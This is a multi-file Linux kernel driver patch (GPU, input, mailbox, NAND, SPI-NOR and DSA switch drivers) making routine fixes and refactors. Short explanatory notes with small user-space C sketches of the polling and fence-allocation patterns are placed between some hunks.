+diff --git a/drivers/gpu/drm/i915/gvt/gtt.h b/drivers/gpu/drm/i915/gvt/gtt.h
+index a3b0f59ec8bd9..4cb183e06e95a 100644
+--- a/drivers/gpu/drm/i915/gvt/gtt.h
++++ b/drivers/gpu/drm/i915/gvt/gtt.h
+@@ -224,7 +224,6 @@ void intel_vgpu_reset_ggtt(struct intel_vgpu *vgpu, bool invalidate_old);
+ void intel_vgpu_invalidate_ppgtt(struct intel_vgpu *vgpu);
+ 
+ int intel_gvt_init_gtt(struct intel_gvt *gvt);
+-void intel_vgpu_reset_gtt(struct intel_vgpu *vgpu);
+ void intel_gvt_clean_gtt(struct intel_gvt *gvt);
+ 
+ struct intel_vgpu_mm *intel_gvt_find_ppgtt_mm(struct intel_vgpu *vgpu,
+diff --git a/drivers/gpu/drm/i915/i915_request.c b/drivers/gpu/drm/i915/i915_request.c
+index 803cd2ad4deb5..7ce126a01cbf6 100644
+--- a/drivers/gpu/drm/i915/i915_request.c
++++ b/drivers/gpu/drm/i915/i915_request.c
+@@ -134,9 +134,7 @@ static void i915_fence_release(struct dma_fence *fence)
+ 	i915_sw_fence_fini(&rq->semaphore);
+ 
+ 	/*
+-	 * Keep one request on each engine for reserved use under mempressure
+-	 * do not use with virtual engines as this really is only needed for
+-	 * kernel contexts.
++	 * Keep one request on each engine for reserved use under mempressure.
+ 	 *
+ 	 * We do not hold a reference to the engine here and so have to be
+ 	 * very careful in what rq->engine we poke. The virtual engine is
+@@ -166,8 +164,7 @@ static void i915_fence_release(struct dma_fence *fence)
+ 	 * know that if the rq->execution_mask is a single bit, rq->engine
+ 	 * can be a physical engine with the exact corresponding mask.
+ 	 */
+-	if (!intel_engine_is_virtual(rq->engine) &&
+-	    is_power_of_2(rq->execution_mask) &&
++	if (is_power_of_2(rq->execution_mask) &&
+ 	    !cmpxchg(&rq->engine->request_pool, NULL, rq))
+ 		return;
+ 
+diff --git a/drivers/gpu/drm/mxsfb/mxsfb_kms.c b/drivers/gpu/drm/mxsfb/mxsfb_kms.c
+index 3bcc9c0f20193..7ed2516b6de05 100644
+--- a/drivers/gpu/drm/mxsfb/mxsfb_kms.c
++++ b/drivers/gpu/drm/mxsfb/mxsfb_kms.c
+@@ -611,6 +611,14 @@ static void mxsfb_plane_overlay_atomic_update(struct drm_plane *plane,
+ 	writel(ctrl, mxsfb->base + LCDC_AS_CTRL);
+ }
+ 
++static void mxsfb_plane_overlay_atomic_disable(struct drm_plane *plane,
++					       struct drm_atomic_state *state)
++{
++	struct mxsfb_drm_private *mxsfb = to_mxsfb_drm_private(plane->dev);
++
++	writel(0, mxsfb->base + LCDC_AS_CTRL);
++}
++
+ static bool mxsfb_format_mod_supported(struct drm_plane *plane,
+ 				       uint32_t format,
+ 				       uint64_t modifier)
+@@ -626,6 +634,7 @@ static const struct drm_plane_helper_funcs mxsfb_plane_primary_helper_funcs = {
+ static const struct drm_plane_helper_funcs mxsfb_plane_overlay_helper_funcs = {
+ 	.atomic_check = mxsfb_plane_atomic_check,
+ 	.atomic_update = mxsfb_plane_overlay_atomic_update,
++	.atomic_disable = mxsfb_plane_overlay_atomic_disable,
+ };
+ 
+ static const struct drm_plane_funcs mxsfb_plane_funcs = {
+diff --git a/drivers/gpu/drm/virtio/virtgpu_ioctl.c b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+index da45215a933d0..bc8c1e9a845fd 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_ioctl.c
++++ b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+@@ -43,13 +43,9 @@ static int virtio_gpu_fence_event_create(struct drm_device *dev,
+ 					 struct virtio_gpu_fence *fence,
+ 					 uint32_t ring_idx)
+ {
+-	struct virtio_gpu_fpriv *vfpriv = file->driver_priv;
+ 	struct virtio_gpu_fence_event *e = NULL;
+ 	int ret;
+ 
+-	if (!(vfpriv->ring_idx_mask & BIT_ULL(ring_idx)))
+-		return 0;
+-
+ 	e = kzalloc(sizeof(*e), GFP_KERNEL);
+ 	if (!e)
+ 		return -ENOMEM;
+@@ -121,6 +117,7 @@ static int virtio_gpu_execbuffer_ioctl(struct drm_device *dev, void *data,
+ 	struct virtio_gpu_device *vgdev = dev->dev_private;
+ 	struct virtio_gpu_fpriv *vfpriv = file->driver_priv;
+ 	struct virtio_gpu_fence *out_fence;
++	bool drm_fence_event;
+ 	int ret;
+ 	uint32_t *bo_handles = NULL;
+ 	void __user *user_bo_handles = NULL;
+@@ -216,15 +213,24 @@ static int virtio_gpu_execbuffer_ioctl(struct drm_device *dev, void *data,
+ 			goto out_memdup;
+ 	}
+ 
+-	out_fence = virtio_gpu_fence_alloc(vgdev, fence_ctx, ring_idx);
+-	if(!out_fence) {
+-		ret = -ENOMEM;
+-		goto out_unresv;
+-	}
++	if ((exbuf->flags & VIRTGPU_EXECBUF_RING_IDX) &&
++	    (vfpriv->ring_idx_mask & BIT_ULL(ring_idx)))
++		drm_fence_event = true;
++	else
++		drm_fence_event = false;
+ 
+-	ret = virtio_gpu_fence_event_create(dev, file, out_fence, ring_idx);
+-	if (ret)
+-		goto out_unresv;
++	if ((exbuf->flags & VIRTGPU_EXECBUF_FENCE_FD_OUT) ||
++	    exbuf->num_bo_handles ||
++	    drm_fence_event)
++		out_fence = virtio_gpu_fence_alloc(vgdev, fence_ctx, ring_idx);
++	else
++		out_fence = NULL;
++
++	if (drm_fence_event) {
++		ret = virtio_gpu_fence_event_create(dev, file, out_fence, ring_idx);
++		if (ret)
++			goto out_unresv;
++	}
+ 
+ 	if (out_fence_fd >= 0) {
+ 		sync_file = sync_file_create(&out_fence->f);
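
The execbuffer rework above only allocates the fence when something
will consume it: a sync-file FD, buffer reservations, or a userspace
fence event. A condensed sketch of that decision (flag names are
illustrative):

#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>

struct fence { int ring_idx; };

static struct fence *maybe_alloc_fence(bool wants_fence_fd,
				       unsigned int num_bo_handles,
				       bool wants_fence_event,
				       int ring_idx)
{
	struct fence *f;

	if (!wants_fence_fd && !num_bo_handles && !wants_fence_event)
		return NULL;	/* nobody will ever wait on it */

	f = malloc(sizeof(*f));
	if (f)
		f->ring_idx = ring_idx;
	return f;
}
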
+diff --git a/drivers/hwspinlock/qcom_hwspinlock.c b/drivers/hwspinlock/qcom_hwspinlock.c
+index 9cf186362ae2f..3f08cd4a5c280 100644
+--- a/drivers/hwspinlock/qcom_hwspinlock.c
++++ b/drivers/hwspinlock/qcom_hwspinlock.c
+@@ -69,9 +69,18 @@ static const struct hwspinlock_ops qcom_hwspinlock_ops = {
+ 	.unlock		= qcom_hwspinlock_unlock,
+ };
+ 
++static const struct regmap_config sfpb_mutex_config = {
++	.reg_bits		= 32,
++	.reg_stride		= 4,
++	.val_bits		= 32,
++	.max_register		= 0x100,
++	.fast_io		= true,
++};
++
+ static const struct qcom_hwspinlock_of_data of_sfpb_mutex = {
+ 	.offset = 0x4,
+ 	.stride = 0x4,
++	.regmap_config = &sfpb_mutex_config,
+ };
+ 
+ static const struct regmap_config tcsr_msm8226_mutex_config = {
+diff --git a/drivers/input/keyboard/tca6416-keypad.c b/drivers/input/keyboard/tca6416-keypad.c
+index afcdfbb002ff3..9c1489c0dae13 100644
+--- a/drivers/input/keyboard/tca6416-keypad.c
++++ b/drivers/input/keyboard/tca6416-keypad.c
+@@ -148,7 +148,7 @@ static int tca6416_keys_open(struct input_dev *dev)
+ 	if (chip->use_polling)
+ 		schedule_delayed_work(&chip->dwork, msecs_to_jiffies(100));
+ 	else
+-		enable_irq(chip->irqnum);
++		enable_irq(chip->client->irq);
+ 
+ 	return 0;
+ }
+@@ -160,7 +160,7 @@ static void tca6416_keys_close(struct input_dev *dev)
+ 	if (chip->use_polling)
+ 		cancel_delayed_work_sync(&chip->dwork);
+ 	else
+-		disable_irq(chip->irqnum);
++		disable_irq(chip->client->irq);
+ }
+ 
+ static int tca6416_setup_registers(struct tca6416_keypad_chip *chip)
+@@ -266,12 +266,7 @@ static int tca6416_keypad_probe(struct i2c_client *client,
+ 		goto fail1;
+ 
+ 	if (!chip->use_polling) {
+-		if (pdata->irq_is_gpio)
+-			chip->irqnum = gpio_to_irq(client->irq);
+-		else
+-			chip->irqnum = client->irq;
+-
+-		error = request_threaded_irq(chip->irqnum, NULL,
++		error = request_threaded_irq(client->irq, NULL,
+ 					     tca6416_keys_isr,
+ 					     IRQF_TRIGGER_FALLING |
+ 					     IRQF_ONESHOT | IRQF_NO_AUTOEN,
+@@ -279,7 +274,7 @@ static int tca6416_keypad_probe(struct i2c_client *client,
+ 		if (error) {
+ 			dev_dbg(&client->dev,
+ 				"Unable to claim irq %d; error %d\n",
+-				chip->irqnum, error);
++				client->irq, error);
+ 			goto fail1;
+ 		}
+ 	}
+@@ -297,10 +292,8 @@ static int tca6416_keypad_probe(struct i2c_client *client,
+ 	return 0;
+ 
+ fail2:
+-	if (!chip->use_polling) {
+-		free_irq(chip->irqnum, chip);
+-		enable_irq(chip->irqnum);
+-	}
++	if (!chip->use_polling)
++		free_irq(client->irq, chip);
+ fail1:
+ 	input_free_device(input);
+ 	kfree(chip);
+@@ -311,10 +304,8 @@ static void tca6416_keypad_remove(struct i2c_client *client)
+ {
+ 	struct tca6416_keypad_chip *chip = i2c_get_clientdata(client);
+ 
+-	if (!chip->use_polling) {
+-		free_irq(chip->irqnum, chip);
+-		enable_irq(chip->irqnum);
+-	}
++	if (!chip->use_polling)
++		free_irq(client->irq, chip);
+ 
+ 	input_unregister_device(chip->input);
+ 	kfree(chip);
+@@ -324,10 +315,9 @@ static void tca6416_keypad_remove(struct i2c_client *client)
+ static int tca6416_keypad_suspend(struct device *dev)
+ {
+ 	struct i2c_client *client = to_i2c_client(dev);
+-	struct tca6416_keypad_chip *chip = i2c_get_clientdata(client);
+ 
+ 	if (device_may_wakeup(dev))
+-		enable_irq_wake(chip->irqnum);
++		enable_irq_wake(client->irq);
+ 
+ 	return 0;
+ }
+@@ -335,10 +325,9 @@ static int tca6416_keypad_suspend(struct device *dev)
+ static int tca6416_keypad_resume(struct device *dev)
+ {
+ 	struct i2c_client *client = to_i2c_client(dev);
+-	struct tca6416_keypad_chip *chip = i2c_get_clientdata(client);
+ 
+ 	if (device_may_wakeup(dev))
+-		disable_irq_wake(chip->irqnum);
++		disable_irq_wake(client->irq);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/input/misc/iqs7222.c b/drivers/input/misc/iqs7222.c
+index e47ab6c1177f5..f24b174c72667 100644
+--- a/drivers/input/misc/iqs7222.c
++++ b/drivers/input/misc/iqs7222.c
+@@ -1381,9 +1381,6 @@ static int iqs7222_ati_trigger(struct iqs7222_private *iqs7222)
+ 	if (error)
+ 		return error;
+ 
+-	sys_setup &= ~IQS7222_SYS_SETUP_INTF_MODE_MASK;
+-	sys_setup &= ~IQS7222_SYS_SETUP_PWR_MODE_MASK;
+-
+ 	for (i = 0; i < IQS7222_NUM_RETRIES; i++) {
+ 		/*
+ 		 * Trigger ATI from streaming and normal-power modes so that
+@@ -1561,8 +1558,11 @@ static int iqs7222_dev_init(struct iqs7222_private *iqs7222, int dir)
+ 			return error;
+ 	}
+ 
+-	if (dir == READ)
++	if (dir == READ) {
++		iqs7222->sys_setup[0] &= ~IQS7222_SYS_SETUP_INTF_MODE_MASK;
++		iqs7222->sys_setup[0] &= ~IQS7222_SYS_SETUP_PWR_MODE_MASK;
+ 		return 0;
++	}
+ 
+ 	return iqs7222_ati_trigger(iqs7222);
+ }
+diff --git a/drivers/mailbox/qcom-ipcc.c b/drivers/mailbox/qcom-ipcc.c
+index 7e27acf6c0cca..f597a1bd56847 100644
+--- a/drivers/mailbox/qcom-ipcc.c
++++ b/drivers/mailbox/qcom-ipcc.c
+@@ -227,10 +227,8 @@ static int qcom_ipcc_setup_mbox(struct qcom_ipcc *ipcc,
+ 			ret = of_parse_phandle_with_args(client_dn, "mboxes",
+ 						"#mbox-cells", j, &curr_ph);
+ 			of_node_put(curr_ph.np);
+-			if (!ret && curr_ph.np == controller_dn) {
++			if (!ret && curr_ph.np == controller_dn)
+ 				ipcc->num_chans++;
+-				break;
+-			}
+ 		}
+ 	}
+ 
+diff --git a/drivers/mtd/nand/raw/brcmnand/brcmnand.c b/drivers/mtd/nand/raw/brcmnand/brcmnand.c
+index d8418d7fcc372..39661e23d7d4f 100644
+--- a/drivers/mtd/nand/raw/brcmnand/brcmnand.c
++++ b/drivers/mtd/nand/raw/brcmnand/brcmnand.c
+@@ -272,6 +272,7 @@ struct brcmnand_controller {
+ 	const unsigned int	*page_sizes;
+ 	unsigned int		page_size_shift;
+ 	unsigned int		max_oob;
++	u32			ecc_level_shift;
+ 	u32			features;
+ 
+ 	/* for low-power standby/resume only */
+@@ -596,6 +597,34 @@ enum {
+ 	INTFC_CTLR_READY		= BIT(31),
+ };
+ 
++/***********************************************************************
++ * NAND ACC CONTROL bitfield
++ *
++ * Some bits have remained constant throughout hardware revision, while
++ * others have shifted around.
++ ***********************************************************************/
++
++/* Constant for all versions (where supported) */
++enum {
++	/* See BRCMNAND_HAS_CACHE_MODE */
++	ACC_CONTROL_CACHE_MODE				= BIT(22),
++
++	/* See BRCMNAND_HAS_PREFETCH */
++	ACC_CONTROL_PREFETCH				= BIT(23),
++
++	ACC_CONTROL_PAGE_HIT				= BIT(24),
++	ACC_CONTROL_WR_PREEMPT				= BIT(25),
++	ACC_CONTROL_PARTIAL_PAGE			= BIT(26),
++	ACC_CONTROL_RD_ERASED				= BIT(27),
++	ACC_CONTROL_FAST_PGM_RDIN			= BIT(28),
++	ACC_CONTROL_WR_ECC				= BIT(30),
++	ACC_CONTROL_RD_ECC				= BIT(31),
++};
++
++#define	ACC_CONTROL_ECC_SHIFT			16
++/* Only for v7.2 */
++#define	ACC_CONTROL_ECC_EXT_SHIFT		13
++
+ static inline bool brcmnand_non_mmio_ops(struct brcmnand_controller *ctrl)
+ {
+ #if IS_ENABLED(CONFIG_MTD_NAND_BRCMNAND_BCMA)
+@@ -737,6 +766,12 @@ static int brcmnand_revision_init(struct brcmnand_controller *ctrl)
+ 	else if (of_property_read_bool(ctrl->dev->of_node, "brcm,nand-has-wp"))
+ 		ctrl->features |= BRCMNAND_HAS_WP;
+ 
++	/* v7.2 has different ecc level shift in the acc register */
++	if (ctrl->nand_version == 0x0702)
++		ctrl->ecc_level_shift = ACC_CONTROL_ECC_EXT_SHIFT;
++	else
++		ctrl->ecc_level_shift = ACC_CONTROL_ECC_SHIFT;
++
+ 	return 0;
+ }
+ 
+@@ -931,30 +966,6 @@ static inline int brcmnand_cmd_shift(struct brcmnand_controller *ctrl)
+ 	return 0;
+ }
+ 
+-/***********************************************************************
+- * NAND ACC CONTROL bitfield
+- *
+- * Some bits have remained constant throughout hardware revision, while
+- * others have shifted around.
+- ***********************************************************************/
+-
+-/* Constant for all versions (where supported) */
+-enum {
+-	/* See BRCMNAND_HAS_CACHE_MODE */
+-	ACC_CONTROL_CACHE_MODE				= BIT(22),
+-
+-	/* See BRCMNAND_HAS_PREFETCH */
+-	ACC_CONTROL_PREFETCH				= BIT(23),
+-
+-	ACC_CONTROL_PAGE_HIT				= BIT(24),
+-	ACC_CONTROL_WR_PREEMPT				= BIT(25),
+-	ACC_CONTROL_PARTIAL_PAGE			= BIT(26),
+-	ACC_CONTROL_RD_ERASED				= BIT(27),
+-	ACC_CONTROL_FAST_PGM_RDIN			= BIT(28),
+-	ACC_CONTROL_WR_ECC				= BIT(30),
+-	ACC_CONTROL_RD_ECC				= BIT(31),
+-};
+-
+ static inline u32 brcmnand_spare_area_mask(struct brcmnand_controller *ctrl)
+ {
+ 	if (ctrl->nand_version == 0x0702)
+@@ -967,18 +978,15 @@ static inline u32 brcmnand_spare_area_mask(struct brcmnand_controller *ctrl)
+ 		return GENMASK(4, 0);
+ }
+ 
+-#define NAND_ACC_CONTROL_ECC_SHIFT	16
+-#define NAND_ACC_CONTROL_ECC_EXT_SHIFT	13
+-
+ static inline u32 brcmnand_ecc_level_mask(struct brcmnand_controller *ctrl)
+ {
+ 	u32 mask = (ctrl->nand_version >= 0x0600) ? 0x1f : 0x0f;
+ 
+-	mask <<= NAND_ACC_CONTROL_ECC_SHIFT;
++	mask <<= ACC_CONTROL_ECC_SHIFT;
+ 
+ 	/* v7.2 includes additional ECC levels */
+-	if (ctrl->nand_version >= 0x0702)
+-		mask |= 0x7 << NAND_ACC_CONTROL_ECC_EXT_SHIFT;
++	if (ctrl->nand_version == 0x0702)
++		mask |= 0x7 << ACC_CONTROL_ECC_EXT_SHIFT;
+ 
+ 	return mask;
+ }
+@@ -992,8 +1000,8 @@ static void brcmnand_set_ecc_enabled(struct brcmnand_host *host, int en)
+ 
+ 	if (en) {
+ 		acc_control |= ecc_flags; /* enable RD/WR ECC */
+-		acc_control |= host->hwcfg.ecc_level
+-			       << NAND_ACC_CONTROL_ECC_SHIFT;
++		acc_control &= ~brcmnand_ecc_level_mask(ctrl);
++		acc_control |= host->hwcfg.ecc_level << ctrl->ecc_level_shift;
+ 	} else {
+ 		acc_control &= ~ecc_flags; /* disable RD/WR ECC */
+ 		acc_control &= ~brcmnand_ecc_level_mask(ctrl);
+@@ -1072,6 +1080,14 @@ static int bcmnand_ctrl_poll_status(struct brcmnand_controller *ctrl,
+ 		cpu_relax();
+ 	} while (time_after(limit, jiffies));
+ 
++	/*
++	 * do a final check after the timeout in case the CPU was busy and the
++	 * driver did not get enough time to perform the polling; avoids false alarms
++	 */
++	val = brcmnand_read_reg(ctrl, BRCMNAND_INTFC_STATUS);
++	if ((val & mask) == expected_val)
++		return 0;
++
+ 	dev_warn(ctrl->dev, "timeout on status poll (expected %x got %x)\n",
+ 		 expected_val, val & mask);
+ 
+@@ -1461,19 +1477,33 @@ static int write_oob_to_regs(struct brcmnand_controller *ctrl, int i,
+ 			     const u8 *oob, int sas, int sector_1k)
+ {
+ 	int tbytes = sas << sector_1k;
+-	int j;
++	int j, k = 0;
++	u32 last = 0xffffffff;
++	u8 *plast = (u8 *)&last;
+ 
+ 	/* Adjust OOB values for 1K sector size */
+ 	if (sector_1k && (i & 0x01))
+ 		tbytes = max(0, tbytes - (int)ctrl->max_oob);
+ 	tbytes = min_t(int, tbytes, ctrl->max_oob);
+ 
+-	for (j = 0; j < tbytes; j += 4)
++	/*
++	 * tbytes may not be a multiple of the word size. Make sure we don't
++	 * read past the buffer and stop at the last full word.
++	 */
++	for (j = 0; (j + 3) < tbytes; j += 4)
+ 		oob_reg_write(ctrl, j,
+ 				(oob[j + 0] << 24) |
+ 				(oob[j + 1] << 16) |
+ 				(oob[j + 2] <<  8) |
+ 				(oob[j + 3] <<  0));
++
++	/* handle the remaining bytes */
++	while (j < tbytes)
++		plast[k++] = oob[j++];
++
++	if (tbytes & 0x3)
++		oob_reg_write(ctrl, (tbytes & ~0x3), (__force u32)cpu_to_be32(last));
++
+ 	return tbytes;
+ }
+ 
+@@ -1592,7 +1622,17 @@ static void brcmnand_send_cmd(struct brcmnand_host *host, int cmd)
+ 
+ 	dev_dbg(ctrl->dev, "send native cmd %d addr 0x%llx\n", cmd, cmd_addr);
+ 
+-	BUG_ON(ctrl->cmd_pending != 0);
++	/*
++	 * If we came here through _panic_write and there is a pending
++	 * command, try to wait for it. If it times out, rather than
++	 * hitting BUG_ON, just return so we don't crash while crashing.
++	 */
++	if (oops_in_progress) {
++		if (ctrl->cmd_pending &&
++			bcmnand_ctrl_poll_status(ctrl, NAND_CTRL_RDY, NAND_CTRL_RDY, 0))
++			return;
++	} else
++		BUG_ON(ctrl->cmd_pending != 0);
+ 	ctrl->cmd_pending = cmd;
+ 
+ 	ret = bcmnand_ctrl_poll_status(ctrl, NAND_CTRL_RDY, NAND_CTRL_RDY, 0);
+@@ -2561,7 +2601,7 @@ static int brcmnand_set_cfg(struct brcmnand_host *host,
+ 	tmp &= ~brcmnand_ecc_level_mask(ctrl);
+ 	tmp &= ~brcmnand_spare_area_mask(ctrl);
+ 	if (ctrl->nand_version >= 0x0302) {
+-		tmp |= cfg->ecc_level << NAND_ACC_CONTROL_ECC_SHIFT;
++		tmp |= cfg->ecc_level << ctrl->ecc_level_shift;
+ 		tmp |= cfg->spare_area_size;
+ 	}
+ 	nand_writereg(ctrl, acc_control_offs, tmp);
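
The bcmnand_ctrl_poll_status() hunk generalizes well: on a busy or
preemptible system the deadline can expire between the last register
read and the time check, so sampling once more after the loop avoids
reporting a false timeout. A user-space sketch of the same pattern
(read_status() is a toy stand-in for the MMIO read):

#include <stdint.h>
#include <time.h>

static volatile uint32_t fake_reg;	/* toy stand-in for a register */

static uint32_t read_status(void) { return fake_reg; }

static int poll_status(uint32_t mask, uint32_t want, long timeout_ms)
{
	struct timespec t0, t;

	clock_gettime(CLOCK_MONOTONIC, &t0);
	do {
		if ((read_status() & mask) == want)
			return 0;
		clock_gettime(CLOCK_MONOTONIC, &t);
	} while ((t.tv_sec - t0.tv_sec) * 1000L +
		 (t.tv_nsec - t0.tv_nsec) / 1000000L < timeout_ms);

	/* Final sample: the deadline may have passed while this task
	 * was scheduled out, not because the hardware is stuck. */
	if ((read_status() & mask) == want)
		return 0;

	return -1;
}
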
+diff --git a/drivers/mtd/spi-nor/winbond.c b/drivers/mtd/spi-nor/winbond.c
+index ffaa240552598..b7c775b615e85 100644
+--- a/drivers/mtd/spi-nor/winbond.c
++++ b/drivers/mtd/spi-nor/winbond.c
+@@ -120,8 +120,9 @@ static const struct flash_info winbond_nor_parts[] = {
+ 		NO_SFDP_FLAGS(SECT_4K) },
+ 	{ "w25q80bl", INFO(0xef4014, 0, 64 * 1024,  16)
+ 		NO_SFDP_FLAGS(SECT_4K) },
+-	{ "w25q128", INFO(0xef4018, 0, 64 * 1024, 256)
+-		NO_SFDP_FLAGS(SECT_4K) },
++	{ "w25q128", INFO(0xef4018, 0, 0, 0)
++		PARSE_SFDP
++		FLAGS(SPI_NOR_HAS_LOCK | SPI_NOR_HAS_TB) },
+ 	{ "w25q256", INFO(0xef4019, 0, 64 * 1024, 512)
+ 		NO_SFDP_FLAGS(SECT_4K | SPI_NOR_DUAL_READ | SPI_NOR_QUAD_READ)
+ 		.fixups = &w25q256_fixups },
+diff --git a/drivers/net/dsa/sja1105/sja1105.h b/drivers/net/dsa/sja1105/sja1105.h
+index fb3cd4c78faa8..06e0ebfe652a4 100644
+--- a/drivers/net/dsa/sja1105/sja1105.h
++++ b/drivers/net/dsa/sja1105/sja1105.h
+@@ -132,6 +132,8 @@ struct sja1105_info {
+ 	int max_frame_mem;
+ 	int num_ports;
+ 	bool multiple_cascade_ports;
++	/* Every {port, TXQ} has its own CBS shaper */
++	bool fixed_cbs_mapping;
+ 	enum dsa_tag_protocol tag_proto;
+ 	const struct sja1105_dynamic_table_ops *dyn_ops;
+ 	const struct sja1105_table_ops *static_ops;
+@@ -262,6 +264,8 @@ struct sja1105_private {
+ 	 * the switch doesn't confuse them with one another.
+ 	 */
+ 	struct mutex mgmt_lock;
++	/* Serializes accesses to the FDB */
++	struct mutex fdb_lock;
+ 	/* PTP two-step TX timestamp ID, and its serialization lock */
+ 	spinlock_t ts_id_lock;
+ 	u8 ts_id;
+diff --git a/drivers/net/dsa/sja1105/sja1105_dynamic_config.c b/drivers/net/dsa/sja1105/sja1105_dynamic_config.c
+index 7729d3f8b7f50..984c0e604e8de 100644
+--- a/drivers/net/dsa/sja1105/sja1105_dynamic_config.c
++++ b/drivers/net/dsa/sja1105/sja1105_dynamic_config.c
+@@ -1175,18 +1175,15 @@ const struct sja1105_dynamic_table_ops sja1110_dyn_ops[BLK_IDX_MAX_DYN] = {
+ 
+ static int
+ sja1105_dynamic_config_poll_valid(struct sja1105_private *priv,
+-				  struct sja1105_dyn_cmd *cmd,
+-				  const struct sja1105_dynamic_table_ops *ops)
++				  const struct sja1105_dynamic_table_ops *ops,
++				  void *entry, bool check_valident,
++				  bool check_errors)
+ {
+ 	u8 packed_buf[SJA1105_MAX_DYN_CMD_SIZE] = {};
++	struct sja1105_dyn_cmd cmd = {};
+ 	int rc;
+ 
+-	/* We don't _need_ to read the full entry, just the command area which
+-	 * is a fixed SJA1105_SIZE_DYN_CMD. But our cmd_packing() API expects a
+-	 * buffer that contains the full entry too. Additionally, our API
+-	 * doesn't really know how many bytes into the buffer does the command
+-	 * area really begin. So just read back the whole entry.
+-	 */
++	/* Read back the whole entry + command structure. */
+ 	rc = sja1105_xfer_buf(priv, SPI_READ, ops->addr, packed_buf,
+ 			      ops->packed_size);
+ 	if (rc)
+@@ -1195,11 +1192,25 @@ sja1105_dynamic_config_poll_valid(struct sja1105_private *priv,
+ 	/* Unpack the command structure, and return it to the caller in case it
+ 	 * needs to perform further checks on it (VALIDENT).
+ 	 */
+-	memset(cmd, 0, sizeof(*cmd));
+-	ops->cmd_packing(packed_buf, cmd, UNPACK);
++	ops->cmd_packing(packed_buf, &cmd, UNPACK);
+ 
+ 	/* Hardware hasn't cleared VALID => still working on it */
+-	return cmd->valid ? -EAGAIN : 0;
++	if (cmd.valid)
++		return -EAGAIN;
++
++	if (check_valident && !cmd.valident && !(ops->access & OP_VALID_ANYWAY))
++		return -ENOENT;
++
++	if (check_errors && cmd.errors)
++		return -EINVAL;
++
++	/* Don't dereference possibly NULL pointer - maybe caller
++	 * only wanted to see whether the entry existed or not.
++	 */
++	if (entry)
++		ops->entry_packing(packed_buf, entry, UNPACK);
++
++	return 0;
+ }
+ 
+ /* Poll the dynamic config entry's control area until the hardware has
+@@ -1208,16 +1219,19 @@ sja1105_dynamic_config_poll_valid(struct sja1105_private *priv,
+  */
+ static int
+ sja1105_dynamic_config_wait_complete(struct sja1105_private *priv,
+-				     struct sja1105_dyn_cmd *cmd,
+-				     const struct sja1105_dynamic_table_ops *ops)
++				     const struct sja1105_dynamic_table_ops *ops,
++				     void *entry, bool check_valident,
++				     bool check_errors)
+ {
+-	int rc;
+-
+-	return read_poll_timeout(sja1105_dynamic_config_poll_valid,
+-				 rc, rc != -EAGAIN,
+-				 SJA1105_DYNAMIC_CONFIG_SLEEP_US,
+-				 SJA1105_DYNAMIC_CONFIG_TIMEOUT_US,
+-				 false, priv, cmd, ops);
++	int err, rc;
++
++	err = read_poll_timeout(sja1105_dynamic_config_poll_valid,
++				rc, rc != -EAGAIN,
++				SJA1105_DYNAMIC_CONFIG_SLEEP_US,
++				SJA1105_DYNAMIC_CONFIG_TIMEOUT_US,
++				false, priv, ops, entry, check_valident,
++				check_errors);
++	return err < 0 ? err : rc;
+ }
+ 
+ /* Provides read access to the settings through the dynamic interface
+@@ -1286,25 +1300,14 @@ int sja1105_dynamic_config_read(struct sja1105_private *priv,
+ 	mutex_lock(&priv->dynamic_config_lock);
+ 	rc = sja1105_xfer_buf(priv, SPI_WRITE, ops->addr, packed_buf,
+ 			      ops->packed_size);
+-	if (rc < 0) {
+-		mutex_unlock(&priv->dynamic_config_lock);
+-		return rc;
+-	}
+-
+-	rc = sja1105_dynamic_config_wait_complete(priv, &cmd, ops);
+-	mutex_unlock(&priv->dynamic_config_lock);
+ 	if (rc < 0)
+-		return rc;
++		goto out;
+ 
+-	if (!cmd.valident && !(ops->access & OP_VALID_ANYWAY))
+-		return -ENOENT;
++	rc = sja1105_dynamic_config_wait_complete(priv, ops, entry, true, false);
++out:
++	mutex_unlock(&priv->dynamic_config_lock);
+ 
+-	/* Don't dereference possibly NULL pointer - maybe caller
+-	 * only wanted to see whether the entry existed or not.
+-	 */
+-	if (entry)
+-		ops->entry_packing(packed_buf, entry, UNPACK);
+-	return 0;
++	return rc;
+ }
+ 
+ int sja1105_dynamic_config_write(struct sja1105_private *priv,
+@@ -1356,22 +1359,14 @@ int sja1105_dynamic_config_write(struct sja1105_private *priv,
+ 	mutex_lock(&priv->dynamic_config_lock);
+ 	rc = sja1105_xfer_buf(priv, SPI_WRITE, ops->addr, packed_buf,
+ 			      ops->packed_size);
+-	if (rc < 0) {
+-		mutex_unlock(&priv->dynamic_config_lock);
+-		return rc;
+-	}
+-
+-	rc = sja1105_dynamic_config_wait_complete(priv, &cmd, ops);
+-	mutex_unlock(&priv->dynamic_config_lock);
+ 	if (rc < 0)
+-		return rc;
++		goto out;
+ 
+-	cmd = (struct sja1105_dyn_cmd) {0};
+-	ops->cmd_packing(packed_buf, &cmd, UNPACK);
+-	if (cmd.errors)
+-		return -EINVAL;
++	rc = sja1105_dynamic_config_wait_complete(priv, ops, NULL, false, true);
++out:
++	mutex_unlock(&priv->dynamic_config_lock);
+ 
+-	return 0;
++	return rc;
+ }
+ 
+ static u8 sja1105_crc8_add(u8 crc, u8 byte, u8 poly)
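
The reworked wait_complete() above has a subtlety worth spelling out:
the poll can fail through two channels, the timeout machinery's own
error or a real error code (-ENOENT, -EINVAL) produced by the polled
step, and both must reach the caller. A sketch of the two-channel
error propagation under that assumption:

#include <errno.h>

/* Toy poll step: -EAGAIN means "still busy", anything else is final. */
static int poll_once(int attempt)
{
	return attempt < 3 ? -EAGAIN : -ENOENT;
}

static int wait_complete(void)
{
	int err = 0, rc = -EAGAIN;
	int i;

	for (i = 0; i < 16 && rc == -EAGAIN; i++)
		rc = poll_once(i);

	if (rc == -EAGAIN)
		err = -ETIMEDOUT;	/* the loop itself gave up */

	/* Report the loop's failure first, else the step's verdict. */
	return err < 0 ? err : rc;
}
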
+diff --git a/drivers/net/dsa/sja1105/sja1105_main.c b/drivers/net/dsa/sja1105/sja1105_main.c
+index 947e8f7c09880..f1f1368e8146f 100644
+--- a/drivers/net/dsa/sja1105/sja1105_main.c
++++ b/drivers/net/dsa/sja1105/sja1105_main.c
+@@ -1805,6 +1805,7 @@ static int sja1105_fdb_add(struct dsa_switch *ds, int port,
+ 			   struct dsa_db db)
+ {
+ 	struct sja1105_private *priv = ds->priv;
++	int rc;
+ 
